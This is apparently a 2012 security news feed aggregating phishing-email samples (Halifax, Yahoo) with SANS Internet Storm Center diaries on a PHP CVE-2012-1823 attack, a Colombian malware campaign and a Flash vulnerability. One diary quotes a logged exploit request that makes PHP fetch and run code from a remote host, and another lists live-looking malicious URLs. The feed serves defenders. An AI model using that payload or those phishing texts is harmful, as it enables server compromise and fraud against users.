24/7 Live Malware Mix

New Security Precautions. - Halifax UK

Mon, 28 May 2012 12:00:03 +1800

DEAR VALUED CUSTOMER, Security machinery at Halifax Bank has been upgraded to provide customers with a faster, easier and more efficient online experience. All customers are required to update their account information. Click here to Login to complete the update process. Note: Failure to update your information will lead to online service suspension. Yours sincerely, Online Customer Service Halifax UK ...
Source: http://www.millersmiles.co.uk/email/new-security-precautions-halifax-uk

Ridiculous Deals from Groupon! - PERSONALIZED DEALS

Mon, 28 May 2012 09:00:02 +1800

Ridiculous Deals from Groupon! This email was sent to benyblom@gmail.com. If you no longer wish to receive our emails, click here to unsubscribe ...
Source: http://www.millersmiles.co.uk/email/ridiculous-deals-from-groupon-personalized-deals

PHP vulnerability CVE-2012-1823 being exploited in the wild, (Sun, May 27th)

Sun, 27 May 2012 22:48:35 +1800

Reader Bob detected in his webserver the following string in the access log of his web server:

bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1 404 2890 - .NET CLR 1.0.2914)

This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked:

safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.

disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual.

allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.

allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.

auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and execute it before the code inside index.php.

You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it.

Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know!

Manuel Humberto Santander Pelez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail:msantand at isc dot sans dot org

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: http://isc.sans.edu/diary.html?storyid=13312&rss

This feed is no more! Please see osvdb.org for more info.

Sun, 27 May 2012 14:02:59 +1800

OSVDB has completed a major redesign, and this feed has been replaced with more customizable feeds. Please visit osvdb.org for more information on how to use our new services.
Source: http://osvdb.org/

Halifax - Account Flagged - halifax-online.co.uk

Sun, 27 May 2012 02:00:02 +1800

Account Review Notification Your Account Has Been Flagged As One of The Numerous Accounts That Needs To Be Reviewed. The main reason for this action are * Billing / Payment Issues * Abuse and Terms of Use Issues WE STRONGLY SUGGEST, THAT YOU TRY TO DO THE FOLLOWING: * Review your account Once you've done this your account will be remove from the flagged account automatically. Customer Advisory Halifax ...
Source: http://www.millersmiles.co.uk/email/halifax-account-flagged-halifaxonlinecouk

New e-mail scam targeting Colombian Internet users: This time claiming to be from the Transport ...

Sun, 27 May 2012 01:34:09 +1800

Scams keep coming! This time there were many uses from all across the country targeted by this e-mail scam claiming to be a notice of traffic ticket from the Transport Authority.

Two links were provided in the e-mail: http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html and http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html. Both of them redirects to the file Aviso-Multas_DOC.exe, with MD5 d554f70ce28470350269d8e6778127e3. Once executed, it downloads the following files:

File

MD5

atu.exe

1466d43e8ae62af74a83eb81094c7c25

ky.exe

974f4ceaca680fe4572a0e050fc851db

wrm.exe

e63c7844a75df064d78f1894e6f673bb

The exe files read all the TCP/IP registry parameters. After that, it connects to some servers to report to some kind of a botnet:

One of the reports seems to be sent by mail, because the php script where the program reports gets a warning:

As of today, there are other servers that have removed the offending PHP scripts sending a 404 error to the program. No further action is taken by the program and it becomes resident by creating entries on HKLM\Software\Microsoft\Windows\Currentversion\Run

Have you seen this kind of packets in your network? Let us know!

Manuel Humberto Santander Pelez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail:msantand at isc dot sans dot org

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: http://isc.sans.edu/diary.html?storyid=13309&rss

This feed is no more! Please see osvdb.org for more info.

Sat, 26 May 2012 07:32:01 +1800

Update !!!! - Yahoo Member Service

Sat, 26 May 2012 12:00:01 +1800

Dear Customer, Access to e-mail is about to expire, We recommend that you upgrade your account to avoid the suspension. Please click on the link below to update your account. NlrAxvxzAzxvxmNODWOvxq0568F2mGbrsvxwvUFiM7N1FGUD34iEmTrmw343mnrs3sr0esr1W43CtQsrNVUbMiGSsrsuKXHH9Zuseranddone=yahoomail.php Thank You. Yahoo 2012 . ...
Source: http://www.millersmiles.co.uk/email/update--yahoo-member-servicenoreplyyahoocom

VMware vMA Security Advisory VMSA-2012-0010 - http://www.vmware. ...

Fri, 25 May 2012 12:52:51 +1800

----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: http://isc.sans.edu/diary.html?storyid=13306&rss

Technical Analysis of Flash Player CVE-2012-0779, (Fri, May 25th)

Fri, 25 May 2012 09:39:37 +1800

Microsoft Malware Protection Center (MMPC) posted a technical analysis of malware targeting an Adobe Flash Player (CVE-2012-0779) vulnerability to which Adobe released a critical patch update earlier this month (diary posted here). The technical analysis shows the process how the infection occurs when a malicious document is open. The technical analysis is posted here. Get the latest version of Flash Player here (Flash Player 11.2.202.233 and earlier is vulnerable).

[1] http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129

[2] http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx

[3] http://get.adobe.com/flashplayer/

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: http://isc.sans.edu/diary.html?storyid=13303&rss